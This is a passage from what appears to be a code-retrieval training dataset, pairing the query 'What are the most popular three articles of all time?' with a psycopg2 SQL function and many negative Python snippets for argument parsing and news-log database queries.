for each group using biopython.\\n\\n \\\n Example: python {0} -g grouped_hits.txt -f sequences.fasta\".format(argv[0]),\n formatter_class = argparse.RawDescriptionHelpFormatter)\n \n requiredNamed = parser.add_argument_group('required arguments')\n\n requiredNamed.add_argument(\"-g\", \"--GROUPS\", type=str, required=True,\\\n help=\"Grouped hits file generated by group_self_BLAST.py\", action=\"store\")\n\n requiredNamed.add_argument(\"-f\", \"--FASTA\", type=str, required=True,\\\n help=\"FASTA file containing all sequences.\", action=\"store\")\n\n return parser.parse_args()", "def get_args_from_command_line():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--country_code\", type=str,\n help=\"Country code\",\n default=\"US\")\n parser.add_argument(\"--n_workers\", type=int, help=\"number of workers\",\n default=20)\n parser.add_argument(\"--survey_link\", type=str)\n parser.add_argument(\"--block_size\", help='number of tweets per worker', type=int)\n parser.add_argument(\"--version_number\", type=str)\n parser.add_argument(\"--mode\", type=str, help='Whether to create HIT in sandbox or in production')\n parser.add_argument(\"--language_qualification\", type=int, help='')\n\n args = parser.parse_args()\n return args", "def get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\",\n help=\"text file, one compound per line\", required=True)\n parser.add_argument(\"-j\", \"--jsononto\",\n help=\"json ontology of families\", required=True)\n parser.add_argument(\"-o\", \"--output\",\n help=\"output file\", required=True)\n parser.add_argument(\"-e\", \"--encoded\",\n help=\"identifiers are encoded\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n run_analysis(args.input, args.jsononto, args.output, args.encoded)", "def parse_args():\n # Argument objects\n argument_objects = [\n FindInterfaceArg(),\n InterfaceArg(),\n NaughtyCountArg(),\n FirewallArg(),\n ModelTypeArg(),\n LogArg(),\n ]\n\n # Create the parser and parse the args\n parser = create_parser(argument_objects)\n parsed_args = parser.parse_args()\n options = {}\n\n # Parse all of the options\n for obj in argument_objects:\n if not obj.process_argument(parsed_args, options):\n parser.print_usage()\n exit()\n\n return options", "def parse_commandline_args():\n\n epilog = \"\"\"\n The configuration file must contained a JSON-encoded map. Example: \"{\"name\":\"foo\"}\".\n \"\"\"\n\n parser = utils.ConnectionArgumentParser(\n description=\"Update config (key/value pairs) on a board\", epilog=epilog\n )\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=\"JSON file to load config from (default stdin)\",\n type=open,\n default=sys.stdin,\n dest=\"file\",\n )\n parser.add_argument(\n \"ids\", metavar=\"DEVICEID\", nargs=\"+\", type=int, help=\"Device IDs to flash\"\n )\n\n return parser.parse_args()", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def parse():\n\n args = sys.argv\n if os.name == 'nt' and args and 'python' in os.path.basename(args[0]).lower():\n args = args[2:]\n else:\n args = args[1:]\n args = vars(parser.parse_args(args))\n \n # set the global verbosity level of the script\n script.set_verbosity(args['verbosity']) \n \n return args", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Parse flags to configure the json parsing')\n parser.add_argument(\"-f\", \"--format\", help=\"output format: (csv|tsv|json)\", choices=[\"csv\", \"tsv\", \"json\"],\n default=\"tsv\")\n parser.add_argument(\"-p\", \"--parallelized\", help=\"save output in parallelized or single file format\",\n action=\"store_true\")\n parser.add_argument(\"-i\", \"--input\", help=\"folder where input documents are\", default=\"data\")\n parser.add_argument(\"-o\", \"--output\", help=\"folder where output documents are\", default=\"cleaned\")\n parser.add_argument(\"-d\", \"--documentformat\", help=\"combine all features into a single text per post\",\n action=\"store_true\")\n parser.add_argument(\"-pa\", \"--partitions\", help=\"number of spark partitions\",\n default=1)\n args = parser.parse_args()\n return args", "def main(argv,required_arg,required_arg_type,optional_arg):\n \n # add optional_arguments to the parser\n for option in optional_arg:\n parse_option_dictionary[option]()\n \n # parse the command line\n passed_optional_arg, passed_required_arg = parser.parse_args(argv)\n \n required_arg_values = grabRequiredArgs(passed_required_arg,required_arg,\n required_arg_type)\n\n return required_arg_values, passed_optional_arg", "def parse_args():\n sentinel_dict = {}\n\n def _preprocess_sysargv(argv):\n inputs = []\n for arg in argv[1:]:\n # handles case where values contain --, otherwise they will\n # be interpreted as arguments.\n if '--,' in arg or ',--' in arg or arg == '--':\n sentinel = uuid4().hex\n key = '%s' % sentinel\n sentinel_dict[key] = arg\n inputs.append(sentinel)\n else:\n inputs.append(arg)\n return inputs\n\n def _postprocess_sysargv(v):\n if v in sentinel_dict:\n return sentinel_dict.get(v)\n else:\n return v\n\n #----- read input arguments\n for i, arg in enumerate(sys.argv):\n if (arg[0] == '-') and arg[1].isdigit(): sys.argv[i] = ' ' + arg\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-u', action='store_true', dest='helpmenu',help='extended HELP MENU with examples')\n parser.add_argument('-i','--infile',action='store', dest='infile',help='name of file with SAC or mseed file(s)')\n parser.add_argument('-g','--gain',action='store', dest='sensitivity',help='Stage 0 sensitivity')\n parser.add_argument('-N','--net', action='store', dest='network',help='network')\n parser.add_argument('-S','--sta', action='store', dest='station',help='station')\n parser.add_argument('-C','--cha', action='store', dest='chantype',help='chantype')\n parser.add_argument('-s','--start', action='store', dest='startstring',help='start time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-e','--end', action='store', dest='endstring',help='end time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-d','--duration', action='store', dest='durationinhours',help='duration in hours')\n parser.add_argument('-dc','--dc','--datacenter', action='store', dest='datacenter',default='IRIS',help='FDSN data center (e.g. IRIS, SCEDC, NCEDC)')\n parser.add_argument('-p','--plot',action='store_true',dest='iplot',help='make plots of each hourly trace (NOTE: can be slow)')\n\n helpextended = parser.parse_args(_preprocess_sysargv(sys.argv)).helpmenu\n if ( helpextended is True ):\n print ('')\n print ('portable_pip_squeak: assess a station either using local data or to be downloaded')\n print ('')\n print ('Usage: portable_pip_squeak.py [options]')\n print ('')\n print ('EXAMPLES:')\n print ('portable_pip_squeak.py --infile my_SAC_files.txt')\n print ('portable_pip_squeak.py -N UW -S TKEY -C HH -s 2018-01-01T00:00:00 -d 2 -p')\n print ('portable_pip_squeak.py -N CI -S LEO -C HN -s 2020-01-01T00:00:00 -d 24 -dc SCEDC')\n print ('')\n print ('Inputs if supplying your own data:')\n print (' -i, --infile Name of text file with SAC/mseed file(s) of 3 (Z,N,E) traces.')\n print (' -g, --gain Gain or Stage 0 sensitivity')\n print (' ')\n print ('Inputs if downloading data:')\n print (' -s, --starttime Trace start time (YYYY-MM-DD,HH:MM:SS)')\n print ('')\n print (' One of these:')\n print (' -e, --endtime Trace end time (YYYY-MM-DD,HH:MM:SS)')\n print (' -d, --duration Duration in hours from starttime')\n print (' Note: if duration is neg, starttime becomes endtime')\n print (' N, S, C and a datacenter if other than IRIS')\n print (' -N, --net Network code')\n print (' -S, --sta Station code')\n print (' -C, --cha Channel type, e.g. EN or HH')\n print (' -dc, --datacenter Name of FDSN data center if not IRIS, e.g. SCEDC, NCEDC')\n print (' ')\n print ('Optional flags:')\n print ('-P, --plot Flag to make a figure for each hour. Note: can be slow.')\n print ('-u Print this extended help menu')\n print ('')\n\n\n return parser.parse_args(_preprocess_sysargv(sys.argv))", "def parse_args():\n parser = argparse.ArgumentParser(description=app_description,\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"--input-json\", dest=\"input_json_path\", required=True,\n help=input_json_help)\n\n args = parser.parse_args()\n return args", "def parse_cli():\n parser = OptionParser()\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parseArguments():\n parser = argparse.ArgumentParser(description='Tool run benchmarks and query database')\n parser.add_argument('--version', action=\"store_true\", dest=\"version\", default=False, help=\"Print version\")\n parser.add_argument(\"--query\", \"-q\", action=\"store_true\", dest=\"queryDataBase\", default=False, help=\"Query Data Base\")\n parser.add_argument(\"--performance\", \"-p\", action=\"store_true\", dest=\"queryPerformance\", default=False, help=\"Query Data Base - Performance Metrics\")\n parser.add_argument(\"--run\", \"-r\", action=\"store_true\", dest=\"runBenchmarks\", default=False, help=\"Run Benchmarks and store results in the DB\")\n args = parser.parse_args()\n return args", "def parse_cli():\n args = {}\n arg_name = None\n arg_values = None\n parameters = {}\n\n cli_args = sys.argv\n found_params = False\n skip = True\n iterator = enumerate(cli_args)\n\n for idx, arg in iterator:\n if skip:\n skip = False\n continue\n else:\n skip = True\n\n if arg == \"--params\":\n if arg_name:\n args[arg_name] = \" \".join(arg_values)\n found_params = True\n skip = False\n\n elif arg[0:2] == \"--\" and not found_params:\n if arg_name:\n args[arg_name] = \" \".join(arg_values)\n arg_name = arg[2:]\n arg_values = []\n skip = False\n\n elif arg[0:2] == \"--\" and found_params:\n raise ValueError(\"You are trying to specify an argument after the \"\n \"--params argument. Please change the order.\")\n\n elif arg[0] == \"-\" and arg[0:2] != \"--\" and found_params:\n parameters[cli_args[idx][1:]] = cli_args[idx+1]\n\n elif arg[0] == \"-\" and arg[0:2] != \"--\" and not found_params:\n raise ValueError(\"You either try to use arguments with only one lea\"\n \"ding minus or try to specify a hyperparameter bef\"\n \"ore the --params argument. %s\" %\n \" \".join(cli_args))\n elif arg[0:2] != \"--\" and not found_params:\n arg_values.append(arg)\n skip = False\n\n elif not found_params:\n raise ValueError(\"Illegal command line string, expected an argument\"\n \" starting with -- but found %s\" % (arg,))\n\n else:\n raise ValueError(\"Illegal command line string, expected a hyperpara\"\n \"meter starting with - but found %s\" % (arg,))\n\n return args, parameters", "def parse_commandline():\n parser = argparse.ArgumentParser(prog=\"passgen\")\n parser.add_argument(\"n\", type=int, nargs=\"?\", default=6,\n help=\"number of words in the pass phrase (default=6)\")\n parser.add_argument(\"--special\", action=\"store_true\",\n help=\"\"\"make pass phrase stronger by randomly inserting\n a special character (default=false)\"\"\")\n parser.add_argument(\"--source\", metavar=\"<file name>\",\n default=\"wordlist.txt\",\n help=\"use alternative word list to generate pass phrase\")\n parser.add_argument(\"--separator\", default=\" \",\n help=\"separator between words (default=\" \")\")\n\n return parser.parse_args()" ]
[ "0.7854356", "0.7411294", "0.738185", "0.7369688", "0.725296", "0.72444576", "0.7242427", "0.7233522", "0.7119903", "0.7105029", "0.70896465", "0.7079773", "0.7079739", "0.7069191", "0.706641", "0.7060959", "0.7060555", "0.7030648", "0.70134765", "0.69964945", "0.6994354", "0.6978943", "0.69728374", "0.69595206", "0.6958412", "0.6956785", "0.69354194", "0.69176507", "0.6915062", "0.6903181", "0.6902011", "0.6901908", "0.690117", "0.6889851", "0.6886239", "0.6880377", "0.6878343", "0.6872707", "0.6868478", "0.6868177", "0.6864077", "0.6860715", "0.68476063", "0.68298304", "0.6829585", "0.6828522", "0.68281186", "0.6816272", "0.68080324", "0.68068695", "0.6799684", "0.6794822", "0.6793404", "0.6792423", "0.67915666", "0.6789505", "0.6789317", "0.6787441", "0.67835855", "0.6782817", "0.678215", "0.67727196", "0.67700756", "0.6763764", "0.67622405", "0.6758813", "0.6755606", "0.6755259", "0.6748387", "0.6744464", "0.6737574", "0.6736242", "0.67331094", "0.67308354", "0.67261577", "0.67254627", "0.6724947", "0.67218894", "0.67218715", "0.6719563", "0.6719325", "0.6718747", "0.6718604", "0.67177814", "0.6716747", "0.6706742", "0.67053133", "0.6701474", "0.67001593", "0.6697296", "0.66972244", "0.6692583", "0.669158", "0.66914266", "0.6691102", "0.6689989", "0.66877735", "0.6686881", "0.66787666", "0.6677475", "0.6671148" ]
0.0
-1
What are the most popular three articles of all time?
def getPopularArticles(): db = psycopg2.connect("dbname=news") c = db.cursor() c.execute(" select count (*) as views, title from articles " + "left join " + "log on concat('/article/', articles.slug) = log.path " + "group by title order by views desc limit 3") views = c.fetchall() db.close() return views
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def most_popular_articles():\n print '1. The most popular articles are...'\n return (\"\"\"SELECT articles.title, COUNT(*) as num FROM articles, log\"\"\"\n \"\"\" WHERE SUBSTRING (log.path FROM 10) = articles.slug and\"\"\"\n \"\"\" log.path != '/' Group By articles.title ORDER By num\"\"\"\n \"\"\" DESC LIMIT 3;\"\"\")", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def popular_articles():\n query = \"\"\"SELECT articles.title,count(*) AS total_views FROM articles,log WHERE log.path like concat('/article/',articles.slug)\n group by articles.title order by total_views desc limit 3\"\"\"\n result = get_data(query)\n print(\" 1. The most popular three articles of all time:\")\n print(\"\")\n for record in result :\n print(' ' + '\\\"' + str(record[0]) + '\\\"' + '-' + ' ' + str(record[1]) + ' '+ 'views')\n print(\" \")", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def top3_articles():\n\n cur.execute(\"\"\"\n SELECT title, COUNT(*) AS article_title\n FROM article_summary\n GROUP BY title\n ORDER BY article_title DESC\n LIMIT 3;\n \"\"\")\n result = cur.fetchall()\n return result", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def query_article():\r\n conn, cur = connect()\r\n query1 = (\"select * from article limit 3\")\r\n cur.execute(query1)\r\n res = cur.fetchall()\r\n conn.close()\r\n print (\"\\nThe most popular three articles of all time:\\n\")\r\n for i in range(0, len(res), 1):\r\n print (res[i][0] + \" --> \" + str(res[i][1]) + \" views\")", "def popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n \"\"\"Connect to news database.\"\"\"\n c = db.cursor()\n \"\"\"Open a cursor to perform database operation.\"\"\"\n query = \"\"\"select title, count(path) as view from articles, log \n where '/article/' || articles.slug = log.path group by title, path \n order by view desc limit 3;\"\"\"\n \"\"\"The cursor runs query and fetches result.\"\"\"\n c.execute(query)\n \"\"\"Execute query using cursor.\"\"\"\n rows = c.fetchall()\n print \"Most popular three articles of all time: \"\n print \"---------------------------------------- \"\n for row in rows:\n print row[0], \"--\", row[1], \" views\"\n db.close()", "def article_rank():\n db, c = connect(DBNAME)\n c.execute(\"select title, count(title) as views from \\\"pathslug\\\" \"\n \"group by title order by views desc limit 3\")\n article_table = c.fetchall()\n db.close()\n print \"\\nThree Most Popular Articles All Time:\"\n for article in article_table:\n print str(article[0]) + \" - \" + str(article[1]) + \" views\"", "def printTopThreeArticles():\n query = \"\"\"\n SELECT author_article_popularity_view.article,\n author_article_popularity_view.views\n FROM author_article_popularity_view\n LIMIT 3;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop 3 articles of all time: \")\n for i, result in enumerate(results):\n print(\"{}. \\\"{}\\\" - {:,} views\".format(i + 1, result[0], result[1]))", "def topArticles():\n c = db.cursor()\n c.execute(\"select titles.title, tophits.hits\\\n from tophits, titles\\\n where tophits.path = titles.slug\\\n order by hits desc limit 3;\")\n results = c.fetchall()\n c.close()\n return results", "def most_viewed_articles():\n query = \"\"\"\n SELECT articles.title, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n WHERE log.status ='200 OK'\n GROUP BY articles.title ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed articles:\")\n for result in results:\n print '{article} - {count} views'.format(\n article=result[0], count=result[1])", "def print_top_articles():\n\n output = get_query_results(\n '''SELECT articles.title, COUNT(path) AS views\n FROM articles\n JOIN log\n ON log.path=CONCAT('/article/', articles.slug)\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3;'''\n )\n print(\"\\nMost Popular Articles: \\n\")\n for title, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(title, views))", "def get_top_3_articles():\n query1 = \"\"\"select title, count(*) as views\n from articles, log\n where log.path like '%' || articles.slug\n group by title\n order by views desc\n limit 3;\"\"\"\n results = execute_query(query1)\n for result in results:\n print(\"- \\\"%s\\\" — %s views\" % (result[0], result[1]))", "def print_popular_articles():\n print(\"3 most popular articles\\n\")\n popularity_data = get_query_results(POPULARITY_QUERY)\n article_row_format = '\"{}\" — {} views'\n for title, views in popularity_data:\n print(article_row_format.format(title, views))", "def get_popular_titles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select articles.title, count(*) as views \"\n \"from articles, log \"\n \"where log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by articles.title \"\n \"order by views desc limit 3\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The three most popular articles of all time are:\\n\\n\")\n # for loop to print each article\n for title, views in results:\n text_file.write(\"\\\"\" + title + \"\\\"\" + \" - \" + str(views) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def most_popular_article_authors():\n\n # To print information\n information_string = '2. The most popular article ' \\\n 'authors of all time are:\\n'\n\n # Query string\n query = \"\"\" select x.author , count(1) as qtd from (\n SELECT b.name as author\n FROM articles a join authors b on(a.author = b.id)\n join log c on(c.path = '/article/' ||a.slug)\n ) x group by x.author order by 2 desc;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t' + str(result[0]) + ' - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def get_most_popular_authors():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\" select t1.name,count(*) as total from authors as t1, articles as t2,log as t3 where t3.path=concat('/article/',t2.slug) and t1.id=t2.author group by t1.name order by total desc limit 3;\")\n\tdata = c.fetchall()\n\tdb.close()\n\n\treturn data", "def get_mostPopularAuthors():\n\n query = \"\"\"\n SELECT authors.name,COUNT(*) as views\n FROM articles join authors\n ON articles.author=authors.id\n JOIN log ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY authors.name\n ORDER BY views DESC\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWho are the most popular article authors of all time?')\n for author, views in posts:\n print(author + \" - \" + str(views) + \" views\")", "def print_popular_articles(articles):\n for (title, views) in articles:\n print \"\\\"%s\\\" - %d views\" % (title, views)", "def top_three_articles(cursor):\n top_articles = 'No articles found'\n try:\n cursor.execute(\"\"\"select title, count(*) as hits\n from articles, log\n where path = ('/article/' || slug)\n group by title\n order by hits desc\n limit 3\n \"\"\")\n article_views = cursor.fetchall()\n # If no articles were found, return\n if len(article_views) <= 0:\n return article_views\n\n except psycopg2.Error as e:\n print('Fetching top articles by views: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any articles, return the results.\n else:\n top_articles = 'Top articles by views: \\r\\n'\n for result in article_views:\n top_articles += ' \"{0} - {1} views\"\\r\\n'.format(result[0],\n result[1])\n return top_articles", "def popular_authors() :\n query = \"\"\"SELECT authors.name,count(*) AS total_views FROM authors,articles,log WHERE log.path like concat ('/article/',articles.slug)\n AND articles.author=authors.id group by authors.name order by total_views desc\"\"\"\n result = get_data(query)\n print(\" 2. The most popular articles authors of all time:\")\n print(\"\")\n for record in result :\n print(' ' +' ' + str(record[0]) + ' -' + ' ' + str(record[1]) + ' ' +'views')\n print(\" \")", "def get_popular_article():\n query_command = \"SELECT * from popular_posts LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def print_top_articles(popular_articles):\n\n print('\\nThe three top most articles viewed are:\\n')\n for article in popular_articles:\n print(article[0] + '\\t-\\t' + str(article[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def keywords(articles, top_n=25):\n\n # compute term idfs\n token_docs = [lemma_tokenize(clean(a.text)) for a in articles]\n local_term_idf = IDF(token_docs)\n\n token_docs, phrases = extract_phrases(token_docs, [a.text for a in articles], global_term_idf)\n\n titles = [a.title for a in articles]\n title_tokens = [lemma_tokenize(clean(t)) for t in titles]\n term_counts = defaultdict(int)\n for doc in token_docs:\n for t in set(doc):\n if t:\n term_counts[t] += 1\n\n title_terms = set()\n for title_tks in title_tokens:\n title_terms = title_terms | set(title_tks)\n for ph in phrases:\n if any(ph in title.lower() for title in titles):\n title_terms.add(ph)\n\n # Score terms\n term_scores = []\n for t, count in term_counts.items():\n # Ignore numbers, they are very specific to a particular event and\n # introduce noise\n try:\n float(t)\n continue\n except ValueError:\n # TODO This is a troublesome token, not sure why it's not filtered out by\n # IDF. needs more investigation\n if t == 'n\\'t':\n continue\n score = count * (global_term_idf[t] - local_term_idf[t])\n if t in title_terms:\n score *= 1.5\n term_scores.append((t, score))\n\n return sorted(term_scores, key=lambda t: t[1], reverse=True)[:top_n]", "def top_authors():\n\n cur.execute(\"\"\"\n SELECT author, count(*) AS article_author\n FROM article_summary\n GROUP BY author\n ORDER BY article_author DESC;\n \"\"\")\n result = cur.fetchall()\n return result", "def most_popular_authors():\n\n results = query_database(QUERIES[1])\n print('\\nWho are the most popular article authors of all time?\\n')\n for author, views in results:\n print(' * {} -- {} views'.format(author, views))", "def most_similar(self, article: str, topn: int = 5):\n return [article[0] for article in self._model.similar_by_word(article, topn)]", "def most_popular_authors():\n print '2. The most popular authors are...'\n return (\"\"\"SELECT authors.name, count(*) as num from\"\"\"\n \"\"\" authors, articles, log WHERE SUBSTRING (log.path FROM 10)\"\"\"\n \"\"\" = articles.slug and articles.author = authors.id and\"\"\"\n \"\"\" log.path != '/' Group By authors.name ORDER by num\"\"\"\n \"\"\" DESC LIMIT 20;\"\"\")", "def how_popular_most_popular(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_count", "def pubs_by_articles_published( data ) :\n # let's be Pythonic and use counter\n result = [ (k,v) for k,v in Counter([x['SO'] for x in data]).iteritems() ]\n # now sort\n result.sort( lambda a,b : cmp(b[1],a[1]) )\n return result", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def calculate_most_popular(text, n_populars, steam=False):\n fdist = calculate_fdist(text, steam)\n term = []\n for key, value in fdist.items():\n term.append((key, value))\n term.sort(key=lambda x: int(x[1]), reverse=True)\n return term[:n_populars]", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select authors.name, count(*) as num \"\n \"from articles, authors, log \"\n \"where articles.author = authors.id \"\n \"and log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by authors.name order by num desc\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The most popular authors of all time are:\\n\\n\")\n # for loop to print each author\n for name, num in results:\n text_file.write(\"\\\"\" + name + \"\\\"\" + \" - \" + str(num) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def most_popular(n=5):\n cars = Car.objects.annotate(review_number=models.Count('reviews'))\n sorted_cars = cars.order_by('review_number')\n return sorted_cars[:n]", "def top_controversial(self, n):\n return top_movies", "def most_viewed_authors():\n query = \"\"\"\n SELECT authors.name, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n JOIN authors\n ON authors.id = articles.author\n WHERE log.status ='200 OK'\n GROUP BY authors.name ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed authors:\")\n for result in results:\n print '{author} - {count} views'.format(\n author=result[0], count=result[1])", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_authors = \"\"\"\n SELECT aut.name, COUNT(lg.id) AS views\n FROM articles AS art\n JOIN log AS lg ON art.slug = SUBSTRING(lg.path,10)\n AND lg.status = '200 OK'\n JOIN authors AS aut ON aut.id = art.author\n GROUP BY aut.name\n ORDER BY views desc; \"\"\"\n c.execute(query_popular_authors)\n authors = from_db_cursor(c)\n db.close()\n return authors", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def most_popular(self, n):\n return popular_tags", "def recommend_for_new_user(titles=False, n_max=10):\n return reader.UserList().get_most_popular_articles(titles=titles)[: n_max]", "def get_mostFrequent(self, n=5):\r\n pass", "def get_mostFrequent(self, n=5):\r\n pass", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n 